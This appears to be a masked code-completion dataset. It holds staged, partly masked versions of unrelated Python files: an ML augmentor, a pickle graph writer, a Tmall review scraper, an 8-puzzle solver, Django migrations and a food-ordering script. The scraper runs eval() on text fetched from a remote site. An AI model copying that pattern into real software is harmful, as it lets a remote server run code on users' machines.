] and augmented_score['score'] >= threshold:
matched.append(i)
logs.append({'original': original[preprocessor.input_column],
'original_label': original_score['label'], 'original_score':
original_score['score'], 'augmented': augmented[
preprocessor.input_column], 'augmented_label':
augmented_score['label'], 'augmented_score':
augmented_score['score']})
return matched, logs
def predict(self, model: PreTrainedModel, examples: Dataset) ->List[Dict
[str, Union[int, float]]]:
model.eval()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model.to(device)
with torch.no_grad():
input_ids = examples['input_ids'].to(device)
if 'token_type_ids' in examples.column_names:
token_type_ids = examples['token_type_ids'].to(device)
outputs = model(input_ids, token_type_ids=token_type_ids)
else:
outputs = model(input_ids)
predictions = outputs[0].cpu().numpy()
scores = np.exp(predictions) / np.exp(predictions).sum(-1, keepdims
=True)
return [{'label': model.config.id2label[item.argmax()], 'score':
item.max().item()} for item in scores]
| from typing import Any, Dict, List, Optional, Tuple, Union
import numpy as np
import torch
from datasets import concatenate_datasets
from datasets.arrow_dataset import Dataset
from transfer_classifier.dataset_preprocessor.classification_dataset_preprocessor import (
ClassificationDatasetPreprocessor,
)
from transformers import PreTrainedModel
from transformers.tokenization_utils import BatchEncoding
class Augmentor:
def __init__(self) -> None:
self.__AUGMENTATION_VALID__ = "VALID"
def augment(
self,
dataset: Dataset,
preprocessor: ClassificationDatasetPreprocessor,
num_trial: int = 2,
discriminator: PreTrainedModel = None,
threshold: float = 0.8,
) -> BatchEncoding:
augmented_samples = None # type: Optional[BatchEncoding]
if discriminator is not None and preprocessor is None:
raise Exception("To use discriminator, preprocessor should be required.")
for _ in range(num_trial):
original = dataset.shuffle()
augmented = self.generate(original, preprocessor)
if discriminator is not None and preprocessor is not None:
matched, log = self.discriminate(discriminator, preprocessor, original, augmented, threshold)
def unmatched_to_invalid(example: Dict[str, Any], index: int) -> Dict[str, Any]:
example[self.__AUGMENTATION_VALID__] = True if index in matched else False
return example
augmented = augmented.map(unmatched_to_invalid, with_indices=True)
augmented = augmented.filter(lambda e: e[self.__AUGMENTATION_VALID__])
if len(augmented) == 0:
continue
if augmented_samples is None:
augmented_samples = augmented
else:
augmented_samples = concatenate_datasets([augmented_samples, augmented])
if len(dataset) <= len(augmented_samples):
augmented_samples = augmented_samples.select(range(len(dataset)))
break
if augmented_samples is not None:
augmented_samples = augmented_samples.remove_columns([self.__AUGMENTATION_VALID__])
augmented_samples = augmented_samples.flatten_indices()
return augmented_samples
def generate(self, dataset: Dataset, preprocessor: ClassificationDatasetPreprocessor) -> BatchEncoding:
raise NotImplementedError("Augmentor subclass should implement augment_sample.")
def discriminate(
self,
model: PreTrainedModel,
preprocessor: ClassificationDatasetPreprocessor,
original: Dataset,
augmented: Dataset,
threshold: float,
) -> Tuple[List[int], List[Dict[str, Union[str, float]]]]:
formatted_original = preprocessor.format(original)
original_scores = self.predict(model, formatted_original)
formatted_augmented = preprocessor.format(augmented)
augmented_scores = self.predict(model, formatted_augmented)
matched = []
logs = []
for i, original, original_score, augmented, augmented_score in zip(
range(len(original)), original, original_scores, augmented, augmented_scores
):
if original_score["label"] == augmented_score["label"] and augmented_score["score"] >= threshold:
matched.append(i)
logs.append(
{
"original": original[preprocessor.input_column],
"original_label": original_score["label"],
"original_score": original_score["score"],
"augmented": augmented[preprocessor.input_column],
"augmented_label": augmented_score["label"],
"augmented_score": augmented_score["score"],
}
)
return (matched, logs)
def predict(
self,
model: PreTrainedModel,
examples: Dataset,
) -> List[Dict[str, Union[int, float]]]:
model.eval()
device = "cuda" if torch.cuda.is_available() else "cpu"
model.to(device)
with torch.no_grad(): # type: ignore
input_ids = examples["input_ids"].to(device)
if "token_type_ids" in examples.column_names:
token_type_ids = examples["token_type_ids"].to(device)
outputs = model(input_ids, token_type_ids=token_type_ids)
else:
outputs = model(input_ids)
predictions = outputs[0].cpu().numpy()
scores = np.exp(predictions) / np.exp(predictions).sum(-1, keepdims=True)
return [{"label": model.config.id2label[item.argmax()], "score": item.max().item()} for item in scores]
| [
1,
5,
6,
7,
8
] |
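generate above raises NotImplementedError, so Augmentor is meant to be subclassed. A minimal illustrative subclass (the identity "augmentation" is a placeholder; a real subclass would paraphrase or back-translate):

class IdentityAugmentor(Augmentor):
    def generate(self, dataset, preprocessor):
        # trivially return the shuffled originals unchanged
        return dataset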
670 | 58d069f6700149793c3446bdd4677f08eaf301ee | <mask token>
class GraphPickleWriter(GraphWriter):
<mask token>
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge],
tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, 'tp_nodes.pkl'), 'wb'
) as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_edges.pkl'), 'wb'
) as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_nodes.pkl'), 'wb'
) as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_edges.pkl'), 'wb'
) as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| <mask token>
class GraphPickleWriter(GraphWriter):
format_key = 'PICKLE'
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge],
tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, 'tp_nodes.pkl'), 'wb'
) as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_edges.pkl'), 'wb'
) as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_nodes.pkl'), 'wb'
) as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_edges.pkl'), 'wb'
) as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| <mask token>
__all__ = ['GraphPickleWriter']
class GraphPickleWriter(GraphWriter):
format_key = 'PICKLE'
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge],
tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, 'tp_nodes.pkl'), 'wb'
) as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_edges.pkl'), 'wb'
) as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_nodes.pkl'), 'wb'
) as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_edges.pkl'), 'wb'
) as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| <mask token>
import os
import pickle
from typing import Mapping
from openbiolink.edge import Edge
from openbiolink.graph_creation.graph_writer.base import GraphWriter
__all__ = ['GraphPickleWriter']
class GraphPickleWriter(GraphWriter):
format_key = 'PICKLE'
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge],
tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, 'tp_nodes.pkl'), 'wb'
) as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_edges.pkl'), 'wb'
) as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_nodes.pkl'), 'wb'
) as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_edges.pkl'), 'wb'
) as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| """A utility for outputting graphs as pickle files.
To test, run ``openbiolink generate --no-download --no-input --output-format pickle --qual hq``.
"""
import os
import pickle
from typing import Mapping
from openbiolink.edge import Edge
from openbiolink.graph_creation.graph_writer.base import GraphWriter
__all__ = [
"GraphPickleWriter",
]
class GraphPickleWriter(GraphWriter):
format_key = 'PICKLE'
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge], tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, "tp_nodes.pkl"), "wb") as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tp_edges.pkl"), "wb") as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tp_namespaces.pkl"), "wb") as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tn_nodes.pkl"), "wb") as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tn_edges.pkl"), "wb") as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tn_namespaces.pkl"), "wb") as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| [
2,
3,
4,
5,
6
] |
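A reader-side sketch matching the writer above (same six file names, pickled with HIGHEST_PROTOCOL); the function name is illustrative:

import os
import pickle

def load_graph_pickles(graph_dir_path):
    parts = {}
    for name in ('tp_nodes', 'tp_edges', 'tp_namespaces',
                 'tn_nodes', 'tn_edges', 'tn_namespaces'):
        with open(os.path.join(graph_dir_path, name + '.pkl'), 'rb') as f:
            parts[name] = pickle.load(f)
    return parts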
671 | 123d3906ce040a4daa5309eae555bad5509f805e | # coding=utf-8
# http://rate.tmall.com/list_detail_rate.htm?itemId=41464129793&sellerId=1652490016¤tPage=1
import requests, re
from Tkinter import *
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import random
plt.rcParams['font.sans-serif']=['SimHei'] # use SimHei so CJK labels render correctly
plt.rcParams['axes.unicode_minus']=False # render minus signs correctly with this font
def worker():
goods_url = L_entry.get()
pages = P_entry.get()
detail_list = []
detail_dict = {}
for i in range(int(pages)):
page = i + 1
goods_url = re.sub(r"currentPage=\d", "currentPage=%s" % page, goods_url)
rsp = requests.get(goods_url, headers=header)
data = rsp.text
data = eval(re.search(r"\{.*", data).group().strip(')').replace("false", "0").replace("true", "1"))
for detail in data['rateDetail']['rateList']:
#for detail in data['rateList']:
try:
size = detail["auctionSku"]
except Exception as e:
print e
continue
size = size.split(";")
s1 = size[0].split(":")[1] if size else ''
s2 = size[1].split(":")[1] if len(size)>1 else ''
s = str(s1) + str(s2)
if s in detail_list:
detail_dict[s] = detail_dict[s] + 1
else:
detail_list.append(s)
detail_dict[s] = 1
root.wm_title("page%d" % page)
root.wm_title("下载完成")
make_image(detail_list,detail_dict)
def make_image(detail_list, detail_dict):
print detail_list
print detail_dict
colors = ['#ff0000', '#eb4310', '#f6941d', '#fbb417', '#ffff00', '#cdd541', '#99cc33', '#3f9337', '#219167',
'#239676', '#24998d', '#1f9baa', '#0080ff', '#3366cc', '#333399', '#003366', '#800080', '#a1488e',
'#c71585', '#bd2158']
people = [detail.decode('utf8') for detail in detail_list]
colors = colors[0:len(people)]
    # number of entries on the y axis
    y_pos = np.arange(len(people))
    # value for each entry, as an array
    performance = [detail_dict[x] for x in detail_list]
    bars = plt.barh(y_pos, performance, align='center')  # horizontal bar chart (barh: h for horizontal)
    # set the bar colors
    for bar, color in zip(bars, colors):
        bar.set_color(color)
    # label for each y-axis entry
    plt.yticks(y_pos, people)
    plt.yticks(fontsize=7)
    # x-axis title
    plt.xlabel('count')
    # x-axis range
plt.xlim(0,max(performance))
    plt.title('Size and color counts from Taobao reviews')
plt.show()
if __name__ == '__main__':
# goods_url = "https://rate.tmall.com/list_detail_rate.htm?itemId=527956695986&spuId=517713513&sellerId=2615125783&order=3¤tPage=1&append=0&content=1&tagId=&posi=&picture=&ua=146UW5TcyMNYQwiAiwZTXFIdUh1SHJOe0BuOG4%3D%7CUm5Ockt%2FRH1IdUB%2BRXpOdiA%3D%7CU2xMHDJ7G2AHYg8hAS8XLwEhD0ghSmQyZA%3D%3D%7CVGhXd1llXGhTal9iV2lSbVlhVmtJfUN4QHpAf0ZyT3JPekB0TGI0%7CVWldfS0SMg01ACAcIAAuE2JbZlInGiYcIAUrfSs%3D%7CVmhIGCcZOQQkGCccJAQ6ADwHJxskESwMOQQ5GSUaLxIyCDcCVAI%3D%7CV25Tbk5zU2xMcEl1VWtTaUlwJg%3D%3D&isg=Ar29SH8guO4XdhyBmwNtPy2rzB938vDSpl9fGH8C9JRDtt3oR6oBfItkFN0K&needFold=0&_ksTS=1496480841428_649&callback=jsonp650"
header = {
"authority": "rate.tmall.com",
"method": "GET",
"scheme": "https",
"accept": "*/*",
"accept-encoding": "gzip, deflate, sdch, br",
"accept-language": "zh-CN,zh;q=0.8",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36",
}
root = Tk()
root.wm_title("淘宝牛统计")
L_label = Label(root, text="链接").grid(row=0, sticky=W)
L_entry = Entry(root,width = 240)
L_entry.grid(row=0, column=1, stick=E)
P_label = Label(root, text="页数").grid(row=1, sticky=W)
P_entry = Entry(root, width = 240)
P_entry.grid(row=1, column=1, stick=E)
start_btn = Button(root, text="开始",anchor = 'center', command=worker).grid(row=3)
width = 300
height = 100
screenwidth = root.winfo_screenwidth()
screenheight = root.winfo_screenheight()
size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
print(size)
root.geometry(size)
root.mainloop()
| null | null | null | null | [
0
] |
672 | a4ecc578a163ee4657a2c9302f79f15c2e4e39de | class Leg:
<mask token>
<mask token>
@property
def smelly(self):
return self.__smelly
<mask token>
def is_smelly(self):
return self.__smelly
| class Leg:
<mask token>
<mask token>
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self, smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly
| class Leg:
<mask token>
def bend_knee(self):
print('knee bent')
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self, smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly
| class Leg:
__smelly = True
def bend_knee(self):
print('knee bent')
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self, smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly
| class Leg():
__smelly = True
def bend_knee(self):
print("knee bent")
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self,smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly | [
3,
4,
5,
6,
7
] |
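Usage sketch for the property pair above:

leg = Leg()
print(leg.smelly)       # True, read through the property getter
leg.smelly = False      # routed through the @smelly.setter
print(leg.is_smelly())  # False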
673 | a85a7ad6ffb2b9aa5f5326d11c75ddbee680fac4 | <mask token>
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = '12345678_'
custo_maximo_absoluto = 100
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto:
return -1
while True:
if not fronteira:
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1)
v = fronteira.pop()
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
if v.custo + 1 < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, '', custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end=' ')
print()
<mask token>
| <mask token>
def busca_caminho(nodo_final, nodo_inicial):
pilha_acoes = deque()
v = nodo_final
while v != nodo_inicial:
pilha_acoes.append(v.acao)
v = v.pai
return pilha_acoes
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = '12345678_'
custo_maximo_absoluto = 100
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto:
return -1
while True:
if not fronteira:
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1)
v = fronteira.pop()
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
if v.custo + 1 < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, '', custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end=' ')
print()
<mask token>
| <mask token>
def busca_caminho(nodo_final, nodo_inicial):
pilha_acoes = deque()
v = nodo_final
while v != nodo_inicial:
pilha_acoes.append(v.acao)
v = v.pai
return pilha_acoes
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = '12345678_'
custo_maximo_absoluto = 100
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto:
return -1
while True:
if not fronteira:
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1)
v = fronteira.pop()
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
if v.custo + 1 < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, '', custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end=' ')
print()
if __name__ == '__main__':
main()
| import sys
import sucessor
import expande
from collections import deque
def busca_caminho(nodo_final, nodo_inicial):
pilha_acoes = deque()
v = nodo_final
while v != nodo_inicial:
pilha_acoes.append(v.acao)
v = v.pai
return pilha_acoes
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = '12345678_'
custo_maximo_absoluto = 100
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
if custo_maximo_atual > custo_maximo_absoluto:
return -1
while True:
if not fronteira:
explorados = None
return busca_dfs(nodo_inicial, custo_maximo_atual + 1)
v = fronteira.pop()
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
if v.custo + 1 < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, '', custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end=' ')
print()
if __name__ == '__main__':
main()
| import sys
import sucessor
import expande
from collections import deque
def busca_caminho(nodo_final, nodo_inicial):
    pilha_acoes = deque()  # stack the actions, since they come back in reverse order
v = nodo_final
while v != nodo_inicial:
pilha_acoes.append(v.acao)
v = v.pai
return pilha_acoes
def busca_dfs(nodo_inicial, custo_maximo_atual):
objetivo = "12345678_"
    custo_maximo_absoluto = 100  # maximum tolerated depth
explorados = set()
fronteira = deque()
fronteira.append(nodo_inicial)
    if custo_maximo_atual > custo_maximo_absoluto:  # if the current depth limit exceeds the tolerated maximum, return -1: most likely no solution exists
return -1
while True:
        if not fronteira:  # if the frontier is empty
explorados = None
            return busca_dfs(nodo_inicial, custo_maximo_atual + 1)  # rerun the search with a larger depth limit
        v = fronteira.pop()  # pop instead of popleft to treat the frontier as a stack
if v.estado == objetivo:
return busca_caminho(v, nodo_inicial)
if v not in explorados:
explorados.add(v)
estados_sucessores = sucessor.sucessor(v.estado)
            # each state reachable from v is added to the frontier, as long as the new states do not exceed the maximum depth
if (v.custo + 1) < custo_maximo_atual:
for e in estados_sucessores:
filho = expande.Nodo(e[1], v, e[0], v.custo + 1)
fronteira.append(filho)
def main():
    # to avoid modifying the existing classes, each state's cost doubles as its depth, since new states always have cost = parent cost + 1
estado_inicial = sys.argv[1]
custo_inicial = 0
pai = expande.Nodo(estado_inicial, 0, "", custo_inicial)
caminho = busca_dfs(pai, 1)
while caminho:
print(caminho.pop(), end = " ")
print()
if __name__ == '__main__':
main()
| [
2,
3,
4,
5,
6
] |
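The entry above is iterative deepening DFS for the 8-puzzle: depth-limited searches are restarted with a growing limit. A compact, self-contained sketch of the same control structure over a generic successor function (all names are illustrative):

def iddfs(start, goal, successors, max_depth=100):
    def dls(node, depth, path):
        if node == goal:
            return path
        if depth == 0:
            return None
        for action, child in successors(node):
            found = dls(child, depth - 1, path + [action])
            if found is not None:
                return found
        return None
    # restart with an increasing depth limit, like busca_dfs above
    for limit in range(max_depth + 1):
        result = dls(start, limit, [])
        if result is not None:
            return result
    return None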
674 | 42d2d8717ec2c25a99302e8de3090d600f8e80ff | <mask token>
| <mask token>
def test_classify_source_files() ->None:
scalatest_files = {'foo/bar/BazSpec.scala'}
junit_files = {'foo/bar/BazTest.scala'}
lib_files = {'foo/bar/Baz.scala'}
assert {ScalatestTestsGeneratorTarget: scalatest_files,
ScalaJunitTestsGeneratorTarget: junit_files,
ScalaSourcesGeneratorTarget: lib_files} == classify_source_files(
junit_files | lib_files | scalatest_files)
| from pants.backend.scala.goals.tailor import classify_source_files
from pants.backend.scala.target_types import ScalaJunitTestsGeneratorTarget, ScalaSourcesGeneratorTarget, ScalatestTestsGeneratorTarget
def test_classify_source_files() ->None:
scalatest_files = {'foo/bar/BazSpec.scala'}
junit_files = {'foo/bar/BazTest.scala'}
lib_files = {'foo/bar/Baz.scala'}
assert {ScalatestTestsGeneratorTarget: scalatest_files,
ScalaJunitTestsGeneratorTarget: junit_files,
ScalaSourcesGeneratorTarget: lib_files} == classify_source_files(
junit_files | lib_files | scalatest_files)
| # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.scala.goals.tailor import classify_source_files
from pants.backend.scala.target_types import (
ScalaJunitTestsGeneratorTarget,
ScalaSourcesGeneratorTarget,
ScalatestTestsGeneratorTarget,
)
def test_classify_source_files() -> None:
scalatest_files = {
"foo/bar/BazSpec.scala",
}
junit_files = {
"foo/bar/BazTest.scala",
}
lib_files = {"foo/bar/Baz.scala"}
assert {
ScalatestTestsGeneratorTarget: scalatest_files,
ScalaJunitTestsGeneratorTarget: junit_files,
ScalaSourcesGeneratorTarget: lib_files,
} == classify_source_files(junit_files | lib_files | scalatest_files)
| null | [
0,
1,
2,
3
] |
675 | b2fa6104f03dc76522a51f352101cef199ddc665 | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('quizzapp', '0005_auto_20191115_2339')]
operations = [migrations.RemoveField(model_name='question', name='titre')]
| from django.db import migrations
class Migration(migrations.Migration):
dependencies = [('quizzapp', '0005_auto_20191115_2339')]
operations = [migrations.RemoveField(model_name='question', name='titre')]
| # Generated by Django 2.2.7 on 2019-11-15 23:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('quizzapp', '0005_auto_20191115_2339'),
]
operations = [
migrations.RemoveField(
model_name='question',
name='titre',
),
]
| [
0,
1,
2,
3,
4
] |
676 | 07bd3c7cacbf8d0e39d06b21456258ad92cb2294 | <mask token>
| def process_option(food, option):
food_name = list(food.keys())[option - 1]
food_price = food[food_name]
print(food_price)
print('You have chosen: ', option, food_name, '!', ' For unit price: ',
food_price)
q = int(input('How many? '))
total = q * food_price
print(food_name, 'x', q, '=', total)
client_name = input('Your name pls: ')
with open('data/' + client_name + '.txt', 'w') as file:
file.write(food_name + '|' + str(q) + '|' + str(food_price) + '|' +
str(total))
<mask token>
| def process_option(food, option):
food_name = list(food.keys())[option - 1]
food_price = food[food_name]
print(food_price)
print('You have chosen: ', option, food_name, '!', ' For unit price: ',
food_price)
q = int(input('How many? '))
total = q * food_price
print(food_name, 'x', q, '=', total)
client_name = input('Your name pls: ')
with open('data/' + client_name + '.txt', 'w') as file:
file.write(food_name + '|' + str(q) + '|' + str(food_price) + '|' +
str(total))
def confirmation():
c = input('Press y/n for confirmation: ')
if c == 'y':
print('Reservation confirmed!')
elif c == 'n':
print('Reservation decline!')
elif c == '':
print('Cancel reservation')
else:
print('CK next time...')
<mask token>
| def process_option(food, option):
food_name = list(food.keys())[option - 1]
food_price = food[food_name]
print(food_price)
print('You have chosen: ', option, food_name, '!', ' For unit price: ',
food_price)
q = int(input('How many? '))
total = q * food_price
print(food_name, 'x', q, '=', total)
client_name = input('Your name pls: ')
with open('data/' + client_name + '.txt', 'w') as file:
file.write(food_name + '|' + str(q) + '|' + str(food_price) + '|' +
str(total))
def confirmation():
c = input('Press y/n for confirmation: ')
if c == 'y':
print('Reservation confirmed!')
elif c == 'n':
print('Reservation decline!')
elif c == '':
print('Cancel reservation')
else:
print('CK next time...')
def show_order_info():
client_name = input('Your name in data: ')
file = open('data/' + client_name + '.txt', 'r')
data = file.read()
file.close()
print(data)
|
# module: order functionality
# HW2: complete this func
def process_option(food, option):
# print(food.keys())
food_name = list(food.keys())[option-1]
food_price = food[food_name]
print(food_price)
print("You have chosen: ", option, food_name, "!", " For unit price: ", food_price)
# HW2: ask quantity
# if ENTER = cancel
# if ent numb = calc total (func separate func)
# print total
# ask confirmation (y/n)
# ask for costumer name
# save the order data in data/<name>order.txt
q = int(input("How many? "))
total = q * food_price
print(food_name, "x", q, "=", total)
# file = open("copy.txt", "w")
# file.write("Your text goes here")
# file.close()
client_name = input("Your name pls: ")
# file = open("data/" + client_name + ".txt", "w")
# file.write(food_name + "|" + str(q) + str(food_price) + "|" + str(total))
# file.close()
with open("data/" + client_name + ".txt", "w") as file:
file.write(food_name + "|" + str(q) + "|" + str(food_price) + "|" + str(total))
def confirmation():
c = input("Press y/n for confirmation: ")
if c == "y":
print("Reservation confirmed!")
elif c == "n":
print("Reservation decline!")
elif c == "":
print("Cancel reservation")
else:
print("CK next time...")
def show_order_info():
client_name = input("Your name in data: ")
file = open("data/" + client_name + ".txt", "r")
data = file.read()
file.close()
print(data)
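# Typical flow: process_option() writes data/<name>.txt, confirmation()
# asks for a y/n answer, and show_order_info() reads the saved order back.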
| [
0,
1,
2,
3,
4
] |
677 | 37f610457e51599a29168accd95eaa6699c6f777 | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('accounts', '0011_auto_20201104_0936')]
operations = [migrations.AddField(model_name='users', name='isadmin',
field=models.IntegerField(default=0)), migrations.AlterField(
model_name='users', name='created_at', field=models.DateTimeField(
default='2020-11-05 16:33:16'))]
| from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('accounts', '0011_auto_20201104_0936')]
operations = [migrations.AddField(model_name='users', name='isadmin',
field=models.IntegerField(default=0)), migrations.AlterField(
model_name='users', name='created_at', field=models.DateTimeField(
default='2020-11-05 16:33:16'))]
| # Generated by Django 2.2 on 2020-11-05 16:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0011_auto_20201104_0936'),
]
operations = [
migrations.AddField(
model_name='users',
name='isadmin',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='users',
name='created_at',
field=models.DateTimeField(default='2020-11-05 16:33:16'),
),
]
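# Note: default='2020-11-05 16:33:16' is a literal string captured when
# makemigrations ran, not a callable such as timezone.now, so the column
# default is a fixed timestamp rather than the insertion time.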
| [
0,
1,
2,
3,
4
] |
678 | d786e89b9d478dcff3c541c89731247075d078c3 | <mask token>
def globalVariableCheck(debug=False):
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:'
, liquor)
if liquor in ignoreGrapeLookup:
print(
